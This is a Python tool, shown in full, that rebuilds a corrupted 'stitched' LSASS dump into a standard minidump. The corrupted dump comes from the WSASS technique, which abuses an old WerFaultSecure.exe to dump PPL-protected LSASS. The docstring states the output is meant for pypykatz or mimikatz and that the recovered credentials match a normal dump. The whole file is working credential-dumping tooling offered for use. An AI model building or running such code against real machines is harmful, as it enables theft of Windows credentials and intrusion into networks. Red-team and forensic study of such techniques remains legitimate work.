|
#!/usr/bin/env python3 |
|
""" |
|
Decode a WerFaultSecure / WSASS "stitched" LSASS dump into a standard minidump. |
|
|
|
Background |
|
---------- |
|
The WSASS technique (https://github.com/TwoSevenOneT/WSASS) dumps PPL-protected |
|
LSASS using an out-of-date WerFaultSecure.exe. On a modern OS that binary is no |
|
longer ABI-compatible with the host's wer.dll/faultrep.dll, and the WER |
|
"stitched minidump" writer ends up mis-driving MiniDumpWriteDump: file seeks in |
|
the I/O callback are dropped, so memory writes are *appended* instead of placed. |
|
|
|
The result keeps a valid 'MDMP' magic but is otherwise non-standard and cannot be |
|
parsed by pypykatz or mimikatz: |
|
* the MINIDUMP_HEADER's NumberOfStreams / StreamDirectoryRva are stale (point at |
|
offset 0x20, which actually holds SystemInfo stream data); |
|
* the real stream directory is relocated to the end of the file, and its stream |
|
RVAs are *logical* offsets that do not match the physical file layout; |
|
* process memory is written as a (VA,size) descriptor array plus a heavily |
|
duplicated set of partial "passes", interleaved with ~340 MB of WER auxiliary |
|
module-image data. |
|
|
|
This tool reconstructs a clean minidump (SystemInfo + ModuleList + MemoryList) |
|
that standard tools can parse. The ModuleList is rebuilt from the PE images found |
|
in the recovered memory. Validated on a Win11 24H2 (Build 26100) sample: the |
|
recovered credentials are byte-identical to a normal MiniDumpWriteDump dump of the |
|
same machine. |
|
|
|
Usage: python3 werfault_decode.py <input.werdump> <output.minidump> |
|
""" |
|
import bisect
import re
import struct
import sys
from collections import Counter
|
|
|
def _find_key_anchors(raw):
    """Return ``(file_offset, key_va)`` for each key-handle candidate in *raw*.

    A candidate is a 'RUUU' tag sitting 4 bytes into a record that also has
    'KSSM' at +0x24 and, at +0x10, a 64-bit value inside
    0x1b0000000000..0x200000000000. ``file_offset`` is the start of the record
    and ``key_va`` is that 64-bit value minus 0x20.
    """
    sz = len(raw)
    anchors = []
    for m in re.finditer(b'RUUU', raw):
        st = m.start() - 4
        if st < 0 or st + 0x28 > sz:
            continue
        kp = struct.unpack_from('<Q', raw, st + 16)[0]
        if raw[st + 0x24:st + 0x28] == b'KSSM' and 0x1b0000000000 <= kp < 0x200000000000:
            anchors.append((st, kp - 0x20))
    return anchors


def decode(SRC, DST):
    """Rebuild a standard minidump at *DST* from the stitched dump at *SRC*.

    The whole input is read into memory, then processed in five steps:

    1. locate the (VA, size) memory descriptor array and pick its real start;
    2. derive the candidate file bases of the duplicated memory "passes";
    3. choose, per memory region, the file offset its bytes are copied from;
    4. rebuild a module list from PE headers found at region starts;
    5. write a minidump with SystemInfo (7), ModuleList (4) and MemoryList (5)
       streams.

    Progress is printed to stdout.

    Args:
        SRC: path of the stitched WER dump to read.
        DST: path of the minidump to write (overwritten if it exists).

    Raises:
        ValueError: if no memory descriptor array can be found, or if the
            recovered memory does not fit the 32-bit RVAs of a MemoryList.
        OSError: if *SRC* cannot be read or *DST* cannot be written.
    """
    with open(SRC, 'rb') as src_file:
        raw = src_file.read()
    sz = len(raw)

    def u16(o):
        return struct.unpack_from('<H', raw, o)[0]

    def u32(o):
        return struct.unpack_from('<I', raw, o)[0]

    def u64(o):
        return struct.unpack_from('<Q', raw, o)[0]

    def desc_at(o):
        # One 16-byte descriptor record: (VA, size), both little-endian u64.
        return struct.unpack_from('<QQ', raw, o)

    if raw[:4] not in (b'MDMP', b'\x89PNG'):
        print("[!] not an MDMP/PNG-magic file, continuing anyway")

    # 1) locate the Memory64 (VA,size) descriptor array: longest ascending run of
    #    16-byte (VA in user space, page-aligned size) records, searched unaligned.
    print("[*] locating memory descriptor array ...")

    def good(v, d):
        return 0x10000 <= v < 0x7fffffffffff and d and d % 0x1000 == 0 and d <= 0x40000000

    best = (0, 0)
    # Scan the front region only (descriptors live in the metadata area, well
    # before the bulk) and stop while a full 16-byte record is still readable,
    # so inputs smaller than the scan window do not run off the end of the file.
    scan_end = min(0x200000, sz - 15)
    for o in range(0x20, scan_end):  # every offset; the array is not 8-aligned
        if not good(*desc_at(o)):
            continue
        c = 0
        p = o
        prev = 0
        while p + 16 <= sz:
            v, d = desc_at(p)
            if not (good(v, d) and v >= prev):
                break
            prev = v
            c += 1
            p += 16
        if c > best[0]:
            best = (c, o)
    run_n, run_off = best
    if run_n == 0:
        raise ValueError(f"no memory descriptor array found in {SRC!r}")
    run_end = run_off + run_n * 16

    # The longest ascending run may include a few tiny leading system regions that are not
    # part of the real Memory64 array, shifting all cumulative offsets. Pick the start that
    # makes the duplicated-pass BCRYPT key-handle anchors collapse onto the fewest shared
    # bases (i.e. self-consistent passes) -- a strong, content-independent signal.
    key_anchors = _find_key_anchors(raw)  # (file_off, key_va)

    def start_quality(start_off):
        # Number of anchors agreeing on the most popular pass base when the
        # descriptor array is assumed to begin at start_off.
        n = (run_end - start_off) // 16
        ds_ = [desc_at(start_off + k * 16) for k in range(n)]
        cu = [0]
        for _va, dd in ds_[:-1]:
            cu.append(cu[-1] + dd)
        st_ = [d[0] for d in ds_]
        v = Counter()
        for fo, kva in key_anchors:
            i = bisect.bisect_right(st_, kva) - 1
            if i >= 0 and ds_[i][0] <= kva < ds_[i][0] + ds_[i][1]:
                v[fo - cu[i] - (kva - ds_[i][0])] += 1
        return v.most_common(1)[0][1] if v else 0

    beststart = (-1, run_off)
    # Starts at or past run_end describe an empty array (quality 0) and can
    # never beat run_off itself, so only starts inside the run are tried.
    for s in range(run_off, min(run_off + 0x200, run_end), 16):
        q = start_quality(s)
        if q > beststart[0]:
            beststart = (q, s)
    DESC = beststart[1]

    # Trim leading tiny system pages (e.g. KUSER_SHARED_DATA @0x7ffe0000) that precede the
    # real Memory64 array and otherwise skew every cumulative offset.
    while DESC + 16 <= run_end:
        va0, sz0 = desc_at(DESC)
        if 0x7ffe0000 <= va0 < 0x7fff0000 and sz0 <= 0x2000:
            DESC += 16
        else:
            break
    ndesc = (run_end - DESC) // 16
    if ndesc == 0:
        raise ValueError(f"memory descriptor array in {SRC!r} is empty after trimming")
    descs = [desc_at(DESC + k * 16) for k in range(ndesc)]
    cum = [0]  # cum[k] = total size of regions 0..k-1 (logical offset of region k)
    for _va, ds in descs[:-1]:
        cum.append(cum[-1] + ds)
    total = cum[-1] + descs[-1][1]
    starts = [d[0] for d in descs]
    print(f" descriptor array @0x{DESC:x}: {ndesc} regions, {total/1024/1024:.1f} MB")

    def score(fo, size):
        # Count 8-byte values in the first 0x2000 bytes at fo that fall into
        # one of three address ranges; -1 when [fo, fo+size) is not in the file.
        if fo < 0 or fo + size > sz:
            return -1
        n = min(size, 0x2000)
        c = 0
        for q in range(fo, fo + n, 8):
            v = u64(q)
            if (0x1b0000000000 <= v < 0x200000000000 or 0x3000000000 <= v < 0x3500000000
                    or 0x7ff000000000 <= v < 0x800000000000):
                c += 1
        return c

    # 2) candidate "pass" bases: derived from duplicated copies of a low region, plus
    #    a module end-blob base found by aligning module first-pages to MZ headers.
    print("[*] finding memory-pass bases ...")
    # PE images in the file
    pe = []
    for m in re.finditer(b'MZ', raw):
        off = m.start()
        if off + 0x40 <= sz:
            e = u32(off + 0x3c)
            if 0 < e < 0x1000 and off + e + 4 <= sz and raw[off + e:off + e + 4] == b'PE\x00\x00':
                pe.append(off)
    # module-first-page descriptors: size 0x1000, high VA
    modpages = [k for k in range(ndesc)
                if descs[k][1] == 0x1000 and descs[k][0] >= 0x7ff000000000]
    votes = Counter()
    for k in modpages:
        for po in pe:
            b = po - cum[k]
            if 0x1000000 <= b < sz:
                votes[b] += 1
    endblob = votes.most_common(1)[0][0] if votes else 0

    # collect duplicated-pass bases from co-located BCRYPT key handles (robust anchors).
    # Each pass writes the heap regions in cumulative order at its own base; the EARLIEST
    # pass (lowest base) is the complete "block 0" we use for heaps.
    def di(va):
        # Index of the descriptor whose range contains va, or None.
        i = bisect.bisect_right(starts, va) - 1
        return i if (i >= 0 and descs[i][0] <= va < descs[i][0] + descs[i][1]) else None

    anchor_bases = set()
    for st, kva in key_anchors:
        i = di(kva)
        if i is not None:
            b = st - cum[i] - (kva - descs[i][0])
            if 0 <= b < sz:
                anchor_bases.add(b)
    heapbase = min(anchor_bases) if anchor_bases else (DESC + ndesc * 16 + 0x2000)
    bases = sorted(anchor_bases | {heapbase, endblob})
    print(f" module end-blob base @0x{endblob:x}; heap base @0x{heapbase:x}; {len(bases)} passes")

    # 3) per-region source selection.
    #    * high-VA module/stack regions come from the end-blob (one coherent late pass);
    #    * low heap regions come from the first complete pass (heap base);
    #    * the small band in between (not covered by the first pass) is taken from whichever
    #      pass gives the most valid intra-dump pointers.
    print("[*] selecting per-region sources ...")
    modstart = next((k for k in range(ndesc) if descs[k][0] >= 0x7ff000000000), ndesc)
    # capacity of the first heap pass = distance to the next copy of the descriptor array
    sig = raw[DESC:DESC + 32]
    nxt = raw.find(sig, DESC + 16)
    heap_cap = (nxt - heapbase) if nxt != -1 else (cum[modstart] if modstart < ndesc else cum[-1])
    src = [0] * ndesc
    for k in range(ndesc):
        ds = descs[k][1]
        if k >= modstart:
            src[k] = endblob + cum[k]
        elif cum[k] < heap_cap:
            src[k] = heapbase + cum[k]
        else:
            pick = (-1, heapbase + cum[k])
            for B in bases:
                s = score(B + cum[k], ds)
                if s > pick[0]:
                    pick = (s, B + cum[k])
            src[k] = pick[1]

    # 4) rebuild ModuleList from PE images (names from export directory)
    def va2off(va):
        # File offset holding the byte at virtual address va, or None.
        i = di(va)
        return None if i is None else src[i] + (va - descs[i][0])

    def parse_pe(fo, img_va):
        # Returns (SizeOfImage, TimeDateStamp, CheckSum, export name or None)
        # for a PE32+ header at file offset fo, or None if it is not one.
        if fo is None or fo + 0x40 > sz or raw[fo:fo + 2] != b'MZ':
            return None
        e = u32(fo + 0x3c)
        if not (0 < e < 0x1000) or raw[fo + e:fo + e + 4] != b'PE\x00\x00':
            return None
        coff = fo + e + 4
        opt = coff + 20
        if opt + 0x74 > sz:
            return None  # header truncated by end of file
        ts = u32(coff + 4)
        if u16(opt) != 0x20b:
            return None
        soi = u32(opt + 0x38)
        cs = u32(opt + 0x40)
        er = u32(opt + 0x70)
        name = None
        if er:
            eo = va2off(img_va + er)
            if eo is not None and eo + 0x10 <= sz:
                no = va2off(img_va + u32(eo + 0x0c))
                if no is not None and no < sz:
                    end = raw.find(b'\x00', no)
                    # Without a terminator there is no usable name; a -1 slice
                    # end would otherwise swallow the rest of the file.
                    if end != -1:
                        name = raw[no:end].decode('latin1')
        return soi, ts, cs, name

    modules = []
    for k in range(ndesc):
        fo = src[k]
        if raw[fo:fo + 2] != b'MZ':
            continue
        pe_ = parse_pe(fo, descs[k][0])
        if not pe_:
            continue
        soi, ts, cs, name = pe_
        modules.append((descs[k][0], soi, ts, cs, name or "mod_%x.dll" % descs[k][0]))
    print(f" reconstructed {len(modules)} modules")

    # SystemInfo lives near file start; the directory's SystemInfo stream is the 56 bytes
    # whose ProcessorArchitecture is sane. We scan a small window for it.
    sysinfo = None
    for o in range(0x20, min(0x400, sz - 55)):  # keep all 56 bytes inside the file
        arch = u16(o)
        maj = u32(o + 8)
        build = u32(o + 0x10)
        if arch in (0, 9) and maj == 10 and 1000 < build < 100000:
            sysinfo = bytearray(raw[o:o + 56])
            break
    if sysinfo is None:
        # Fallback record: architecture 9, major version 10, everything else zero.
        sysinfo = bytearray(56)
        struct.pack_into('<H', sysinfo, 0, 9)
        struct.pack_into('<I', sysinfo, 8, 10)
    struct.pack_into('<I', sysinfo, 24, 0)  # zero CSDVersionRva

    # 5) emit standard minidump
    NS = 3
    dir_rva = 32
    out = bytearray(dir_rva + NS * 12)  # header + stream directory, filled in below
    sysinfo_rva = len(out)
    out += sysinfo
    modlist_rva = len(out)
    names_base = modlist_rva + 4 + len(modules) * 108
    nb = bytearray()  # length-prefixed UTF-16LE module names
    nrvas = []
    for (_va, _soi, _ts, _cs, nm) in modules:
        nrvas.append(names_base + len(nb))
        enc = nm.encode('utf-16-le')
        nb += struct.pack('<I', len(enc)) + enc + b'\x00\x00'
    ml = bytearray(struct.pack('<I', len(modules)))
    for (va, soi, ts, cs, _nm), nr in zip(modules, nrvas):
        r = bytearray(108)
        struct.pack_into('<QIIII', r, 0, va, soi, cs, ts, nr)
        ml += r
    out += ml
    out += nb
    memlist_rva = len(out)
    tbl = memlist_rva + 4
    out += b'\x00' * (4 + ndesc * 16)
    data_start = len(out)
    # Memory records store a 32-bit RVA; fail before copying instead of with a
    # struct.error after the whole output has been assembled.
    if data_start + cum[-1] > 0xFFFFFFFF:
        raise ValueError("recovered memory exceeds the 4 GiB limit of 32-bit minidump RVAs")
    struct.pack_into('<I', out, memlist_rva, ndesc)
    for k in range(ndesc):
        va, ds = descs[k]
        so = src[k]
        data = raw[so:so + ds]
        if len(data) < ds:
            data = data.ljust(ds, b'\x00')  # zero-fill what the file does not hold
        struct.pack_into('<QII', out, tbl + k * 16, va, ds, len(out))
        out += data
    struct.pack_into('<I', out, 0, 0x504d444d)
    struct.pack_into('<I', out, 4, 0xa793)
    struct.pack_into('<I', out, 8, NS)
    struct.pack_into('<I', out, 12, dir_rva)
    for i, (t, s, r) in enumerate([(7, len(sysinfo), sysinfo_rva),
                                   (4, len(ml) + len(nb), modlist_rva),
                                   (5, 4 + ndesc * 16, memlist_rva)]):
        struct.pack_into('<III', out, dir_rva + i * 12, t, s, r)
    with open(DST, 'wb') as dst_file:
        dst_file.write(out)
    print(f"[+] wrote {DST}: {len(out)/1024/1024:.1f} MB ({len(modules)} modules, {ndesc} memory ranges)")
|
|
|
if __name__ == '__main__':
    # Command-line entry point: exactly two positional arguments are expected,
    # the input dump and the output minidump. Anything else prints the module
    # docstring (which carries the usage line) and exits with status 1.
    cli_args = sys.argv[1:]
    if len(cli_args) != 2:
        print(__doc__)
        sys.exit(1)
    input_path, output_path = cli_args
    decode(input_path, output_path)